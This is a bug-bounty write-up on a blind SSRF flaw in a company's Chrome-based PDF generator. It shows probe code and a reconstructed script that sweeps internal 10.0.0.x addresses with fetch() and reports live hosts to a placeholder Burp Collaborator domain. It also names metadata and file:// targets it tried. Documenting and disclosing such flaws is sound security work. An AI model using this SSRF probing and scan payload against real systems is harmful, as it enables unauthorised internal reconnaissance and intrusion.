SSRF in Chrome PDF Generator

Discovery

While enumerating subdomains for a certain company, I came across a /pdf endpoint on one of their main regional websites. The page contained this JavaScript (lightly modified here, but functionally the same):

const params = new URLSearchParams(window.location.search);
const url = params.get('url') || '';
const type = params.get('type') || '';

fetch(`/pdf/download?url=${encodeURIComponent(url)}&type=${encodeURIComponent(type)}`)
    .then(response => response.text())
    .then(downloadUrl => {
        if (downloadUrl) {
            const link = document.createElement('a');
            link.href = downloadUrl;
            link.click();
        }
    })
    .catch(error => console.error('Download failed:', error));

// a comment like this was left here in the actual page source
//?type=pdf&url=https://subdomain.target.com/test.html

Both parameters were extracted from the URL and sent to /pdf/download.

Setting the url parameter to a Burp Collaborator payload worked, and I was able to receive callbacks with interesting HTTP headers.

This confirmed blind SSRF. The source IP of the callbacks revealed that the server was an EC2 instance. However, blind SSRF alone demonstrates little impact, so I had to investigate further.
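The probe is easy to reproduce by issuing the same request the page's own script builds. The Collaborator domain below is a placeholder, not the actual payload I used:

```javascript
// Build the same request the page's script issues, but point the url
// parameter at an attacker-controlled host (placeholder domain below).
const collaborator = 'xxxxxx.oastify.com'; // placeholder Collaborator host

function buildProbe(base, targetUrl, type) {
  const qs = new URLSearchParams({ url: targetUrl, type });
  return `${base}/pdf/download?${qs.toString()}`;
}

const probe = buildProbe('https://target.com', `https://${collaborator}/x.html`, 'pdf');
console.log(probe);
// https://target.com/pdf/download?url=https%3A%2F%2Fxxxxxx.oastify.com%2Fx.html&type=pdf
```

If the backend fetches the url parameter, the Collaborator host receives an HTTP callback whose headers identify the fetching client.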

Further Testing

I decided to first understand what the endpoint was used for, so I used the comment left behind. Visiting the /pdf endpoint again with those parameters downloaded a PDF render of the test.html site.

A quick check on the PDF via exiftool showed that it was produced by Skia/PDF m115, meaning the PDF was generated by Chrome/Chromium version 115 using the Skia graphics library. This was in line with the User-Agent received in the callback, which indicated Chrome/115.0.0.0.

In the PDF, the page contents were rendered properly. The PDF was also stored server-side at https://target.com/pdf/test.pdf. A bit of fuzzing showed that .html was the only accepted extension, and that the name of the PDF depended on the name of the HTML file visited (i.e. target.html would produce target.pdf).

So the endpoint was performing these:

  1. Accept url/target.html from user.

  2. Start up a Chrome instance, visit url/target.html.

  3. Let the page render, then produce a PDF of the page as target.pdf.

  4. Store target.pdf on the server-side in the /pdf directory, and then redirect user to download the PDF.

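The naming behaviour observed in steps 3 and 4 can be sketched as follows. This is my reconstruction of the rule, not the actual backend code:

```javascript
// Sketch of the observed naming rule: the stored PDF takes its name from
// the fetched HTML file. Path handling here is illustrative only.
function pdfNameFor(targetUrl) {
  const pathname = new URL(targetUrl).pathname; // e.g. /test.html
  const file = pathname.split('/').pop();       // test.html
  if (!file.endsWith('.html')) {
    // Fuzzing showed .html was the only accepted extension.
    throw new Error('only .html targets are rendered');
  }
  return file.replace(/\.html$/, '.pdf');       // test.pdf
}

console.log(pdfNameFor('https://subdomain.target.com/test.html')); // → test.pdf
```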
From my understanding of Chrome's security features, fetching resources such as file:///etc/passwd is not allowed. Setting the url parameter to http://169.254.169.254/latest/meta-data/ also did not work: nothing was returned. However, since there was no validation of the url parameter, I had full control over what the browser loaded and rendered.

The main impact I achieved was internal network enumeration through arbitrary JavaScript execution. Stored HTML injection was technically also present as a secondary issue, but on its own it carried little impact.

Internal Network Enumeration via JavaScript Execution

Since a real browser was visiting and rendering the page, any JavaScript on it was executed first. Using this, I attempted some internal network enumeration. I used httpworkbench.com to spin up instances to host my HTML.

The HTML I hosted contained a script that swept internal address ranges with fetch() and reported any reachable hosts out-of-band to Burp Collaborator.
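The exact payload isn't reproduced here, but a hypothetical reconstruction of the script embedded in such a page might look like this. The address range and Collaborator domain are placeholders of my own choosing:

```javascript
// Hypothetical reconstruction of an enumeration script hosted in the HTML
// page. Each internal address is probed with fetch(); reachable hosts are
// exfiltrated to a Burp Collaborator placeholder domain.
const collaborator = 'https://xxxxxx.oastify.com'; // placeholder

// Candidate internal hosts to sweep (illustrative range only).
const targets = [];
for (let i = 1; i <= 254; i++) {
  targets.push(`http://10.0.0.${i}`);
}

if (typeof document !== 'undefined') {
  // Only runs inside the headless browser that renders the page. Because the
  // attacker never sees the rendered output directly, results must be
  // reported out-of-band.
  targets.forEach((host) => {
    fetch(host, { mode: 'no-cors' })
      .then(() => fetch(`${collaborator}/?alive=${encodeURIComponent(host)}`))
      .catch(() => {});
  });
}

console.log(targets.length); // → 254
```

Each callback to Collaborator then identifies one internal host that responded to the headless browser.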

Visiting https://target.com/pdf/?type=pdf&url=https://instanceID.instances.httpworkbench.com/products.html executed the payload, and Burp Collaborator received a stream of callbacks from the internal probes.

The AWS metadata endpoint appeared to be properly restricted. Direct file:// access was blocked by Chrome. However, the ability to perform internal network scanning could potentially lead to discovery of internal services, credential theft, or lateral movement within the infrastructure.

Remediation

The company acknowledged the issue and restricted public access to the /pdf endpoint. It felt great to be awarded for this!
